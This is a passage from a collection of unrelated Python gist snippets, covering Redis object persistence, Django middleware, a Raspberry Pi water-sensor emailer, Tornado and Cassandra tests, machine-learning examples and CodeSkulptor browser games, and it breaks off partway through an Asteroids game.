pairs[make_attribute_key(obj, each)] = getattr(obj, each)
return pairs
```
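An end-to-end sketch of the intended flow, assuming Python 2 (the module itself uses ``iteritems``), a local Redis server, and a ``domain`` module that defines the persisted classes; the ``User`` class and all values below are illustrative only.
```python
# Hypothetical usage -- in the real setup User would live in domain.py,
# since read() looks classes up there by name.
import redis


class User(object):
    def __init__(self, name=None, email=None):
        self.name = name
        self.email = email

    def get_identity(self):
        return self.name


db = redis.StrictRedis(host='localhost', port=6379, db=0)
user = User(name='alice', email='alice@example.com')
save(db, user)                                        # one key per attribute
print(exists(db, 'User', 'alice'))                    # True
print(read_attribute(db, 'User', 'alice', 'email'))   # alice@example.com
loaded = read(db, 'User', 'alice')                    # rebuilds a domain.User
delete(db, user)
```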
#### File: hard-gists/5409581/snippet.py
```python
from pyfbsdk import *
def get_first(f, xs):
'''
Returns the first x in xs for which f returns True, or else None.
'''
for x in xs:
if f(x):
return x
return None
def get_selected_relation_box():
'''
Returns a relation constraint box which has been selected by the user, or
None if no relation boxes are selected.
'''
for relation in [c for c in FBSystem().Scene.Constraints if c.Is(FBConstraintRelation_TypeInfo())]:
box = get_first(lambda box: box.Selected, relation.Boxes)
if box:
return box
return None
def get_new_box_name(box):
'''
Prompts the user to enter a new name for the given box. Returns the new
name if the user confirms the rename operation, or None if the user
cancels.
'''
button, string = FBMessageBoxGetUserValue(
'Rename Box?',
'Current name: %s' % box.Name,
box.Name,
FBPopupInputType.kFBPopupString,
'Rename',
'Cancel')
return string if button == 1 else None
def rename_selected_relation_box():
'''
Prompts the user to enter a new name for a selected relation constraint
box. If no boxes are selected, has no effect.
'''
box = get_selected_relation_box()
if box:
name = get_new_box_name(box)
if name:
box.Name = name
if __name__ in ('__main__', '__builtin__'):
rename_selected_relation_box()
```
#### File: hard-gists/540f615dd9d54de47dc52b0ca60522c1/snippet.py
```python
import idc
import idaapi
import idautils
def rename_sub_functions(fva, prefix):
sub_funcs = set([])
for f in idautils.Functions():
for xref in idautils.XrefsTo(f):
subf = idaapi.get_func(xref.frm)
if not subf:
continue
if subf.startEA == fva:
sub_funcs.add(f)
break
for sub_func in sub_funcs:
current_name = idc.GetFunctionName(sub_func)
if current_name.startswith(prefix):
continue
new_name = prefix + current_name
idc.MakeName(sub_func, new_name)
if __name__ == '__main__':
rename_sub_functions(idc.ScreenEA(), "test_")
```
#### File: hard-gists/5441be08c6d80ca55040678bcd79c3c5/snippet.py
```python
from django.conf import settings
from django.http import HttpResponsePermanentRedirect
from django.utils.deprecation import MiddlewareMixin
from django.utils.encoding import escape_uri_path, iri_to_uri
class RemoveTrailingSlashesMiddleware(MiddlewareMixin):
"""Removes all trailing slashes from URL path."""
def process_request(self, request):
"""Removes backslashes from path_info.
Args:
request: User HTTP request.
Returns:
request with changes on the path info (URL).
"""
if request.path[-2:] == '//':
new_path = request.path.rstrip('/')
new_url = '{}{}{}'.format(
escape_uri_path(new_path),
'/' if settings.APPEND_SLASH else '',
(
('?' + iri_to_uri(request.META.get('QUERY_STRING', '')))
if request.META.get('QUERY_STRING', '') else ''
)
)
return HttpResponsePermanentRedirect(new_url)
```
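To wire the middleware up, a hedged settings excerpt; the dotted path assumes the class is saved in a made-up `myproject/middleware.py` module.
```python
# Hypothetical settings.py excerpt (new-style MIDDLEWARE, Django 1.10+).
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'myproject.middleware.RemoveTrailingSlashesMiddleware',  # assumed module path
    'django.middleware.common.CommonMiddleware',
    # ...
]
APPEND_SLASH = True  # keep exactly one trailing slash on the redirect target
```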
#### File: hard-gists/5473058/snippet.py
```python
from matplotlib import pylab # .exe install is on sourceforge
import numpy# easy_install numpy
from mpl_toolkits.basemap import Basemap # easy_install basemap
# functions to create some random data points and convert them to meters via the map projection
def create_points_in_lon_lat(N=10000):
return zip(numpy.random.standard_normal(N)*360, numpy.random.standard_normal(N) * 45)
def convert_lon_lat_points_to_meters_using_transform(points, tran):
# maybe there is a better way to get long/lat into meters but this works ok
return numpy.array([tran(long,lat) for long,lat in points])
# creates an object called map which can plot various things on different projections
map = Basemap(llcrnrlon=-90,llcrnrlat=-90,urcrnrlon=270,urcrnrlat=90,projection='mill')
# get random points in meters
points = convert_lon_lat_points_to_meters_using_transform(create_points_in_lon_lat(), map.projtran)
# draw the hexbin
# points[:,i]: selects all rows but just the ith column - used to turn
# list or long,lat pairs into lists of just long and lat but in the same order.
# gridsize: set the number of hexagons in the x and y dimension
# mincnt: set the minimum count in a hexagon for it to be drawn
# cmap: set the colour map to use
map.hexbin(points[:,0],points[:,1], gridsize=(200,30),mincnt=1,cmap=pylab.cm.Purples)
# draw some features - the basemap object come with these build in but you can load
# features in from a wide range of formats
map.drawcoastlines()
# show the resulting plot in the interactive viewer (waits till figure is closed before continuing)
pylab.show()
# or you could save it directly to a file like this:
#pylab.savefig('hexbintestmap.png')
# see also:
# http://matplotlib.org/basemap/users/examples.html
```
#### File: hard-gists/5480533/snippet.py
```python
username = 'exampleusername' #you don't need the "@gmail.com" bit.
password = '<PASSWORD>'
############################
# General Email Parameters #
############################
From = "<EMAIL>"
To = "recipientaddress#domain.com"
#######################################
# Email Parameters when sensor is Wet #
#######################################
Subject_wet = "RPi Water Sensor is WET"
Body_wet = "Your water sensor is wet."
#######################################
# Email Parameters when sensor is Dry #
#######################################
Subject_dry = "RPi Water Sensor is DRY"
Body_dry = " Your water sensor is dry again!"
import smtplib
from email.mime.text import MIMEText
import RPi.GPIO as GPIO
import string
import time
# Function Definitions
#takes either "wet" or "dry" as the condition.
def email(condition):
print "Attempting to send email"
if condition == 'wet':
Body = string.join((
"From: %s" % From,
"To: %s" % To,
"Subject: %s" % Subject_wet,
"",
Body_wet,
), "\r\n")
if condition == 'dry':
Body = string.join((
"From: %s" % From,
"To: %s" % To,
"Subject: %s" % Subject_dry,
"",
Body_dry,
), "\r\n")
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
print "Logging in..."
server.login(username,password)
print "Logged in as "+username+"."
server.sendmail(From, [To], Body)
server.quit()
print "Email sent."
#Tests whether water is present.
# returns 0 for dry
# returns 1 for wet
# tested to work on pin 18
def RCtime (RCpin):
reading = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(RCpin, GPIO.OUT)
GPIO.output(RCpin, GPIO.LOW)
time.sleep(0.1)
GPIO.setup(RCpin, GPIO.IN)
# This takes about 1 millisecond per loop cycle
while True:
if (GPIO.input(RCpin) == GPIO.LOW):
reading += 1
if reading >= 1000:
return 0
if (GPIO.input(RCpin) != GPIO.LOW):
return 1
# Turns on the piezo buzzer
# tested to work on pin 17
def buzz_on (pin):
GPIO.setmode(GPIO.BCM)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, GPIO.HIGH)
# Turns off the piezo buzzer
# tested to work on pin 17
def buzz_off(pin):
GPIO.setmode(GPIO.BCM)
GPIO.setup(pin, GPIO.OUT)
GPIO.output(pin, GPIO.LOW)
# Main Loop
print 'Waiting for wetness...'
while True:
time.sleep(1) # check for wetness every second
if RCtime(18) == 1:
buzz_on(17)
print "Sensor is wet"
email('wet')
print "Waiting for dryness..."
while True:
time.sleep(1) # check for dryness every second
if RCtime(18) == 0:
buzz_off(17)
print "Sensor is dry again"
email('dry')
print "Waiting for wetness..."
break
```
#### File: hard-gists/5520379/snippet.py
```python
from ghost import Ghost
from functools import wraps
def fix_redirect(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
page, resources = func(self, *args, **kwargs)
if resources and 300 <= resources[0].http_status <= 399:
nextUrl = resources[0].headers['Location']
page, resources = self.open(nextUrl)
return page, resources
return wrapper
class GhostRedirectFix(Ghost):
@fix_redirect
def open(self, *args, **kwargs):
return Ghost.open(self, *args, **kwargs)
@fix_redirect
def click(self, *args, **kwargs):
return Ghost.click(self, *args, **kwargs)
@fix_redirect
def evaluate(self, *args, **kwargs):
return Ghost.evaluate(self, *args, **kwargs)
@fix_redirect
def fill(self, *args, **kwargs):
return Ghost.fill(self, *args, **kwargs)
@fix_redirect
def fire_on(self, *args, **kwargs):
return Ghost.fire_on(self, *args, **kwargs)
@fix_redirect
def set_field_value(self, *args, **kwargs):
return Ghost.set_field_value(self, *args, **kwargs)
def find_elements_by_tag_name(self, tag):
return self.find_element_by_css_selector(tag)
browser = GhostRedirectFix()
```
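A brief usage sketch; the URL and selector are placeholders, and the call pattern assumes the Ghost.py API of that era (methods returning a ``(page, resources)`` tuple).
```python
# Hypothetical usage -- any 3xx answer from open()/click()/fill() is followed
# transparently by the wrapped methods above.
page, resources = browser.open('http://example.com/short-link')
page, resources = browser.click('a.next')  # a 302 here is chased to its target
```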
#### File: hard-gists/5544335/snippet.py
```python
import uuid
from django import template
from django.template.base import Token, TOKEN_BLOCK
register = template.Library()
class MapNode(template.Node):
def __init__(self, var_name, tag, list):
self.var_name = var_name
self.tag = tag
self.list = template.Variable(list)
def render(self, context):
res = []
context.push()
for i in self.list.resolve(context):
context[self.var_name] = i
res.append(self.tag.render(context))
context.pop()
return ''.join(res)
@register.tag
def map(parser, token):
_, tag_name, list = token.split_contents()
var_name = uuid.uuid4().hex
fake_token = Token(TOKEN_BLOCK, '%s %s' % (tag_name, var_name))
tag = parser.tags[tag_name](parser, fake_token)
return MapNode(var_name, tag, list)
# {% map include list_of_templates %}
# {# is like ... #}
# {% for template in list_of_templates %}
# {% include template %}
# {% endfor %}
```
#### File: hard-gists/5553364/snippet.py
```python
import simplegui
import random
# initialize global variables used in your code
max_range = 100
guesses = int() # placeholder, look at init()
message = dict() # placeholder, look at init()
old_message = dict() # placeholder, look at init()
random_number = int() # placeholder, look at init()
max_guesses = int() # placeholder, look at init()
# canvas constants
FONT_SIZE = 14
CANVAS_WIDTH = 420
CANVAS_HEIGHT = 180
AVATAR_SIZE = 40
MARGIN = 6
AVATAR_COORD = {"player": AVATAR_SIZE // 2 + MARGIN,
"python": CANVAS_WIDTH - MARGIN - AVATAR_SIZE // 2}
BUBBLE_MARGIN = {"player": (AVATAR_SIZE + (2 * MARGIN), CANVAS_WIDTH - MARGIN),
"python": (MARGIN, CANVAS_WIDTH - (2 * MARGIN) - AVATAR_SIZE)}
AVATAR = {"python": simplegui.load_image("http://goo.gl/DZjuc"),
"player": simplegui.load_image("http://goo.gl/4fJNf")}
# canvas animation constants
time = 0 # global time
TRANSITION = 5 # transition duration
# helper functions
def init():
global old_message, message, random_number, guesses, max_guesses
# restart number of guesses
guesses = 0
# set max number of guesses
if max_range == 100:
max_guesses = 7
else:
max_guesses = 10
# get random number
random_number = random.randint(0, max_range - 1)
# message is a dictionary holding the logging messages,
# keys represent the player name and values the messages.
# Values are stored in a list because canvas.draw_text()
# can't handle multiline strings automatically.
message = {"python": ["Do you wanna play 'guess the number'?",
"I am thinking of a number between 0 and %s (inclusive)." % str(max_range - 1),
"Take a guess!"],
"player": list()}
old_message = message # buffer for transition
print "\n--- NEW GAME ---"
log_to_console()
def log_to_console():
# Log message dict to the console
for player in ("player", "python"):
for text in message.get(player):
print "%s: %s" % (player, text)
# define event handlers for control panel
def tick():
# simple timer, this is necessary to animate transitions
# between sessions on the canvas.
global time
time += 1
def range100():
# button that changes range to range [0,100) and restarts
global max_range
max_range = 100
init()
def range1000():
# button that changes range to range [0,1000) and restarts
global max_range
max_range = 1000
init()
def get_input(guess):
global message, guesses, time
# assign your guess to the player message
message["player"] = [guess]
# validate
if not guess or not (0 <= int(guess) < max_range):
message["python"] = ["Pick a number between 0 and %s, try again..." % str(max_range - 1)]
log_to_console()
time = 0 # restart time
timer.start() # start transition
return
# count guesses
guess = int(guess)
guesses += 1
# check for a new game
if max_guesses - guesses < 0:
return init()
# check for a winner
elif guess == random_number:
message["python"] = ["Good job!",
"You guessed my number in %s guesses :)" % guesses,
"",
"Do you wanna play again?"]
guesses = 8 # start a new game
# check for game over
elif max_guesses - guesses == 0:
message["python"] = ["Oops!! No turns left :(",
"My number was %s..." % random_number,
"",
"Do you wanna play again?"]
guesses = 8 # start a new game
# keep playing
else:
comp_guess = "high"
if guess < random_number:
comp_guess = "low"
message["python"] = ["Your guess is too %s!" % comp_guess,
"You have %s turns left." % str(max_guesses - guesses),
"Try again..."]
log_to_console()
    time = 0 # restart timeline
timer.start() # start transition
def draw(canvas):
# optional event handler, this function draws a chat/log window
# showing the last interaction between the user and the system
# directly into the canvas.
next_page = False
for text in (old_message, message):
base_height = 0 # base y coordinate for each message group
for player in ("player", "python"):
message_length = len(message.get(player))
if not message_length:
continue # if there's no message for this player, skip this iteration
offset = (CANVAS_HEIGHT * time / TRANSITION) # y coord offset for next page
# render avatar
avatar_posy = (AVATAR_SIZE // 2) + MARGIN + base_height - offset
if next_page:
avatar_posy += CANVAS_HEIGHT
canvas.draw_image(AVATAR.get(player),
(40, 40), (80, 80),
(AVATAR_COORD.get(player), avatar_posy),
(AVATAR_SIZE, AVATAR_SIZE))
# render bubble
bubble_height = (message_length * FONT_SIZE) + ((message_length + 1) * MARGIN)
bubble_posy = [MARGIN + base_height - offset,
bubble_height + base_height - offset]
if next_page:
bubble_posy[0] = bubble_posy[0] + CANVAS_HEIGHT
bubble_posy[1] = bubble_posy[1] + CANVAS_HEIGHT
canvas.draw_polygon([(BUBBLE_MARGIN.get(player)[0], bubble_posy[0]),
(BUBBLE_MARGIN.get(player)[0], bubble_posy[1]),
(BUBBLE_MARGIN.get(player)[1], bubble_posy[1]),
(BUBBLE_MARGIN.get(player)[1], bubble_posy[0])],
1, "Silver", "White")
# render text
i = 0 # line number
for text in message.get(player):
text_posy = (1 + i) * (MARGIN + FONT_SIZE) + base_height - offset
if next_page:
text_posy += CANVAS_HEIGHT
canvas.draw_text(text, (BUBBLE_MARGIN.get(player)[0] + 2,
text_posy),
FONT_SIZE, "Black", "sans-serif")
                i += 1 # accumulate line number
            # accumulate y coordinate to use it in the next message group
if bubble_height > AVATAR_SIZE:
base_height += bubble_height
else:
base_height += AVATAR_SIZE + MARGIN
# change to next page offset
next_page = True
if time >= TRANSITION:
timer.stop()
# create frame
frame = simplegui.create_frame("Guess the number", CANVAS_WIDTH, CANVAS_HEIGHT)
frame.set_canvas_background("Gray")
# register event handlers for control elements
frame.add_button("Range is [0-100)", range100, 200)
frame.add_button("Range is [0-1000)", range1000, 200)
frame.add_input("Enter a guess:", get_input, 195)
frame.set_draw_handler(draw) # canvas handler, used to draw stuff on the canvas
timer = simplegui.create_timer(1000//30, tick) # timer handler, used by transitions
# start frame
init()
frame.start()
```
#### File: hard-gists/561bf3bf6c1477d99e7b/snippet.py
```python
from cassandra.cluster import Cluster, OperationTimedOut
from cassandra.decoder import SyntaxException
from tornado.concurrent import Future
from tornado.testing import AsyncTestCase, gen_test
class TornadoCassandra(object):
def __init__(self, session, ioloop):
self._session = session
self._ioloop = ioloop
def execute(self, *args, **kwargs):
tornado_future = Future()
cassandra_future = self._session.execute_async(*args, **kwargs)
self._ioloop.add_callback(
self._callback, cassandra_future, tornado_future)
return tornado_future
def _callback(self, cassandra_future, tornado_future):
try:
# should spend just about no time blocking.
result = cassandra_future.result(timeout=0)
except OperationTimedOut:
return self._ioloop.add_callback(
self._callback, cassandra_future, tornado_future)
except Exception, exc:
return tornado_future.set_exception(exc)
tornado_future.set_result(result)
class TestTornadoCassandra(AsyncTestCase):
def setUp(self):
super(TestTornadoCassandra, self).setUp()
self.cluster = Cluster(["127.0.0.1"])
self.session = self.cluster.connect()
self.session.execute(
"CREATE KEYSPACE IF NOT EXISTS testingfuture WITH REPLICATION = "
"{ 'class': 'SimpleStrategy', 'replication_factor': 1 }")
self.session.execute("USE testingfuture;")
self.session.execute(
"CREATE TABLE IF NOT EXISTS footable (\n"
"key VARCHAR, \n"
"url VARCHAR, \n"
"PRIMARY KEY (key));")
self.session.execute(
"INSERT INTO footable (key, url) "
"VALUES (%s, %s)", ("foobar", "http://foo.com"))
self.connection = TornadoCassandra(self.session, ioloop=self.io_loop)
def tearDown(self):
super(TestTornadoCassandra, self).tearDown()
self.session.execute("DROP KEYSPACE testingfuture;")
@gen_test
def test_query(self):
results = yield self.connection.execute(
"SELECT key, url FROM footable;")
self.assertEqual(1, len(results))
self.assertEqual(("foobar", "http://foo.com"), results[0])
@gen_test
def test_exception(self):
with self.assertRaises(SyntaxException):
yield self.connection.execute("foobar!")
@gen_test
def test_lots_of_queries(self):
futures = []
count = 2048
for i in range(count):
futures.append(self.connection.execute(
"SELECT key FROM footable;"))
results = 0
for future in futures:
yield future
results += 1
self.assertEqual(count, results)
```
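Outside of the test case, the same bridge could back a coroutine-based handler; a hedged sketch that assumes the `testingfuture` keyspace and `footable` table created above still exist.
```python
# Hypothetical Tornado application using the bridge; keyspace/table are assumed.
from tornado import gen, ioloop, web


class FooHandler(web.RequestHandler):
    @gen.coroutine
    def get(self, key):
        rows = yield self.application.connection.execute(
            "SELECT key, url FROM footable WHERE key = %s", (key,))
        self.write({'rows': [list(r) for r in rows]})


def make_app():
    cluster = Cluster(["127.0.0.1"])
    session = cluster.connect("testingfuture")
    app = web.Application([(r"/foo/(.*)", FooHandler)])
    app.connection = TornadoCassandra(session, ioloop=ioloop.IOLoop.current())
    return app
```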
#### File: hard-gists/561d5eec7fed9ebf48751d124a77b087/snippet.py
```python
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_nn_ops
@ops.RegisterGradient("GuidedRelu")
def _GuidedReluGrad(op, grad):
return tf.select(0. < grad, gen_nn_ops._relu_grad(grad, op.outputs[0]), tf.zeros(grad.get_shape()))
if __name__ == '__main__':
with tf.Session() as sess:
g = tf.get_default_graph()
x = tf.constant([10., 2.])
with g.gradient_override_map({'Relu': 'GuidedRelu'}):
y = tf.nn.relu(x)
z = tf.reduce_sum(-y ** 2)
tf.initialize_all_variables().run()
print x.eval(), y.eval(), z.eval(), tf.gradients(z, x)[0].eval()
# > [ 10. 2.] [ 10. 2.] -104.0 [ 0. 0.]
```
#### File: hard-gists/5623772/snippet.py
```python
from django.contrib.gis.measure import D
def nearby(point, radius, unit):
"""Lists the nearest points to `point`, includes the distance from the point.
Sorted in ascending order (from closest to furthest point).
- radius, the distance to limit the search
- unit, can be kilometers or miles, etc.
returns a QuerySet.
See: https://docs.djangoproject.com/en/dev/ref/contrib/gis/geoquerysets/#distance
"""
qs = MyModel.objects.all()
qs = qs.filter(point__distance_lte=(point, D(**{unit: radius})))
qs = qs.distance(point) # at this point, the type of queryset is GeoQuerySet
qs = qs.order_by('distance')
return qs
nearest = nearby(Point(x, y), 5, 'km')
# => [point1, point2, ...., pointN]
print nearest[0].distance
# => '2392903 m'
```
#### File: hard-gists/5633266/snippet.py
```python
from collections import defaultdict
import re
import numpy as np
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction import FeatureHasher
from sklearn.linear_model.stochastic_gradient import SGDClassifier
from sklearn.externals import joblib
def tokens(doc):
"""Extract tokens from doc.
This uses a simple regex to break strings into tokens. For a more
principled approach, see CountVectorizer or TfidfVectorizer.
"""
return (tok.lower() for tok in re.findall(r"\w+", doc))
def token_freqs(doc):
"""Extract a dict mapping tokens from doc to their frequencies."""
freq = defaultdict(int)
for tok in tokens(doc):
freq[tok] += 1
return freq
def chunker(seq, size):
"""Iterate by chunks on a sequence. Here we simulate what reading
from a stream would do by using a generator."""
for pos in xrange(0, len(seq), size):
yield seq[pos:pos + size]
categories = [
'alt.atheism',
'comp.graphics',
'comp.sys.ibm.pc.hardware',
'misc.forsale',
'rec.autos',
'sci.space',
'talk.religion.misc',
]
dataset = fetch_20newsgroups(subset='train', categories=categories)
classif_data = zip(dataset.data, dataset.target)
classes = np.array(list(set(dataset.target)))
hasher = FeatureHasher()
classifier = SGDClassifier()
for i, chunk in enumerate(chunker(classif_data, 100)):
messages, topics = zip(*chunk)
X = hasher.transform(token_freqs(msg) for msg in messages)
y = np.array(topics)
classifier.partial_fit(X,
                           y,
classes=classes)
if i % 100 == 0:
# dump model to be able to monitor quality and later
# analyse convergence externally
joblib.dump(classifier, 'model_%04d.pkl' % i)
```
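As a follow-up, one of the dumped checkpoints could be loaded back to classify unseen text with the same hasher; a hedged sketch, where the sample sentence is made up and at least one checkpoint must already have been written.
```python
# Hypothetical follow-up: score a new document with a saved checkpoint.
clf = joblib.load('model_0000.pkl')  # written on the first chunk above
X_new = hasher.transform([token_freqs("the rocket launch was delayed again")])
print(dataset.target_names[clf.predict(X_new)[0]])
```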
#### File: hard-gists/5660624/snippet.py
```python
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.compat import text_type
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm import sessionmaker
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import relationship
from sqlalchemy.orm import backref
from sqlalchemy.orm import joinedload
import sqlalchemy as sa
from caching_query import FromCache
from caching_query import RelationshipCache
from caching_query import query_callable
from dogpile.cache import make_region
import hashlib
cache_region = make_region()
regions = {
"default": cache_region
}
DBSession = scoped_session(
sessionmaker(query_cls=query_callable(regions))
)
def md5_key_mangler(key):
"""Receive cache keys as long concatenated strings;
distill them into an md5 hash.
"""
d = hashlib.md5(key.encode('utf-8'))
return d.hexdigest()
class BaseModel(object):
@declared_attr
def pk(self):
return sa.Column(sa.Integer, primary_key=True)
@declared_attr
def date_created(self):
return sa.Column(sa.DateTime)
Base = declarative_base(cls=BaseModel)
class User(Base):
__tablename__ = 'users'
username = sa.Column(sa.String)
class UserProfile(Base):
__tablename__ = 'user_profile'
first_name = sa.Column(sa.Unicode(255))
user_pk = sa.Column(sa.Integer, sa.ForeignKey(User.pk))
user = relationship(User, backref=backref('profile', uselist=False))
def get_user_by_username(session, username, with_profile=True,
from_cache=True):
query = session.query(User).filter(
User.username == username
)
if with_profile:
query = query.options(joinedload('profile'))
if from_cache:
print("Pulling from cache")
query = query.options(FromCache())
query = query.options(RelationshipCache(User.profile))
user = query.one()
return user
def hello_world(request):
user = get_user_by_username(DBSession, 'sontek')
return Response('hello! user #%d' % user.pk)
def main():
config = Configurator()
engine = create_engine('sqlite:///foo.db')
DBSession.configure(bind=engine)
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
user1 = User(
username=text_type('sontek')
)
profile = UserProfile(
user=user1
, first_name=text_type('John')
)
DBSession.add_all([user1, profile])
cache_settings = {
"cache.redis.backend":"dogpile.cache.redis",
"cache.redis.arguments.host": "localhost",
"cache.redis.arguments.port": 6379,
}
cache_region.configure_from_config(cache_settings, "cache.redis.")
config.add_view(hello_world)
app = config.make_wsgi_app()
return app
if __name__ == '__main__':
app = main()
server = make_server('0.0.0.0', 8080, app)
print("Serving at: http://0.0.0.0:8080")
server.serve_forever()
```
#### File: hard-gists/5663cc76aa329b2ddfb5/snippet.py
```python
import os
import signal
import json
from urllib2 import Request, urlopen, URLError
from gi.repository import Gtk as gtk
from gi.repository import AppIndicator3 as appindicator
from gi.repository import Notify as notify
APPINDICATOR_ID = 'myappindicator'
def main():
indicator = appindicator.Indicator.new(APPINDICATOR_ID, os.path.abspath('sample_icon.svg'), appindicator.IndicatorCategory.SYSTEM_SERVICES)
indicator.set_status(appindicator.IndicatorStatus.ACTIVE)
indicator.set_menu(build_menu())
notify.init(APPINDICATOR_ID)
gtk.main()
def build_menu():
menu = gtk.Menu()
item_joke = gtk.MenuItem('Joke')
item_joke.connect('activate', joke)
menu.append(item_joke)
item_quit = gtk.MenuItem('Quit')
item_quit.connect('activate', quit)
menu.append(item_quit)
menu.show_all()
return menu
def fetch_joke():
request = Request('http://api.icndb.com/jokes/random?limitTo=[nerdy]')
response = urlopen(request)
joke = json.loads(response.read())['value']['joke']
return joke
def joke(_):
notify.Notification.new("<b>Joke</b>", fetch_joke(), None).show()
def quit(_):
notify.uninit()
gtk.main_quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal.SIG_DFL)
main()
```
#### File: hard-gists/5684769/snippet.py
```python
import numpy as np
import pylab
from scipy.optimize import curve_fit
def sigmoid(x, x0, k):
y = 1 / (1 + np.exp(-k*(x-x0)))
return y
xdata = np.array([0.0, 1.0, 3.0, 4.3, 7.0, 8.0, 8.5, 10.0, 12.0])
ydata = np.array([0.01, 0.02, 0.04, 0.11, 0.43, 0.7, 0.89, 0.95, 0.99])
popt, pcov = curve_fit(sigmoid, xdata, ydata)
print popt
x = np.linspace(-1, 15, 50)
y = sigmoid(x, *popt)
pylab.plot(xdata, ydata, 'o', label='data')
pylab.plot(x,y, label='fit')
pylab.ylim(0, 1.05)
pylab.legend(loc='best')
pylab.show()
```
#### File: hard-gists/5696520/snippet.py
```python
import simplegui
import math
import random
# globals for user interface
WIDTH = 800
HEIGHT = 600
score = 0
lives = 3
time = 0
class ImageInfo:
def __init__(self, center, size, radius=0, lifespan=None, animated=False):
self.center = center
self.size = size
self.radius = radius
if lifespan:
self.lifespan = lifespan
else:
self.lifespan = float('inf')
self.animated = animated
def get_center(self):
return self.center
def get_size(self):
return self.size
def get_radius(self):
return self.radius
def get_lifespan(self):
return self.lifespan
def get_animated(self):
return self.animated
# art assets created by <NAME>, may be freely re-used in
# non-commercial projects, please credit Kim
# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png
# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png,
# debris_blend.png
debris_info = ImageInfo([320, 240], [640, 480])
debris_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png")
# nebula images - nebula_brown.png, nebula_blue.png
nebula_info = ImageInfo([400, 300], [800, 600])
nebula_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.png")
# splash image
splash_info = ImageInfo([200, 150], [400, 300])
splash_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png")
# ship image
ship_info = ImageInfo([45, 45], [90, 90], 35)
ship_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png")
# missile image - shot1.png, shot2.png, shot3.png
missile_info = ImageInfo([5, 5], [10, 10], 3, 50)
missile_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png")
# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png
asteroid_info = ImageInfo([45, 45], [90, 90], 40)
asteroid_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png")
# animated explosion - explosion_orange.png, explosion_blue.png,
# explosion_blue2.png, explosion_alpha.png
explosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)
explosion_image = simplegui.load_image(
"http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png")
# sound assets purchased from sounddogs.com, please do not redistribute
soundtrack = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3")
missile_sound = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3")
missile_sound.set_volume(.5)
ship_thrust_sound = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3")
explosion_sound = simplegui.load_sound(
"http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3")
# helper functions to handle transformations
def angle_to_vector(ang):
return [math.cos(ang), math.sin(ang)]
def dist(p, q):
return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)
# Sprite class
class Sprite():
def __init__(self, pos, vel, angle, angle_vel, image, info, sound=None):
self.pos = [pos[0], pos[1]]
self.vel = [vel[0], vel[1]]
self.angle = angle
self.angle_vel = angle_vel
self.image = image
self.image_center = info.get_center()
self.image_size = info.get_size()
self.radius = info.get_radius()
self.lifespan = info.get_lifespan()
self.animated = info.get_animated()
self.age = 0
self.sound = sound
if self.sound:
self.sound.rewind()
self.sound.play()
def draw(self, canvas):
canvas.draw_image(self.image, self.image_center, self.image_size,
self.pos, self.image_size, self.angle)
def update(self, friction=0.0):
# update orientation
self.angle += self.angle_vel
for i in range(2):
self.vel[i] *= 1 - friction
# update position
limits = (WIDTH, HEIGHT)
for i in range(2):
self.pos[i] += self.vel[i]
self.pos[i] = self.pos[i] % limits[i]
# Ship class, it inherits from Sprite class
class Ship(Sprite):
def __init__(self, *args, **kwds):
Sprite.__init__(self, *args, **kwds) # inherit from sprite
self.thrust = False
if self.sound:
self.sound.pause()
self.sound.rewind()
def set_thrust(self, value):
self.thrust = value
# shift image center and play/pause sound
if value:
self.image_center[0] *= 3
if self.sound:
self.sound.play()
else:
self.image_center[0] /= 3
if self.sound:
self.sound.pause()
self.sound.rewind()
def shoot(self):
# shoot and return a missile (Sprite object)
point_at = angle_to_vector(self.angle)
pos = list(self.pos)
vel = list(self.vel)
for i in range(2):
pos[i] += point_at[i] * self.image_center[0]
vel[i] += point_at[i] * 5
return Sprite(pos, vel, self.angle, 0, missile_image,
missile_info, missile_sound)
def update(self):
# move forward
if self.thrust:
vel = angle_to_vector(self.angle)
for i in range(2):
self.vel[i] += vel[i] * 0.2
# sprite behaviour
Sprite.update(self, 0.01)
# draw handler
def draw(canvas):
global time
# animate background
time += 1
center = debris_info.get_center()
size = debris_info.get_size()
wtime = (time / 8) % center[0]
canvas.draw_image(nebula_image, nebula_info.get_center(),
nebula_info.get_size(), [WIDTH / 2, HEIGHT / 2],
[WIDTH, HEIGHT])
canvas.draw_image(debris_image, [center[0] - wtime, center[1]],
[size[0] - 2 * wtime, size[1]],
[WIDTH / 2 + 1.25 * wtime, HEIGHT / 2],
[WIDTH - 2.5 * wtime, HEIGHT])
# draw lives
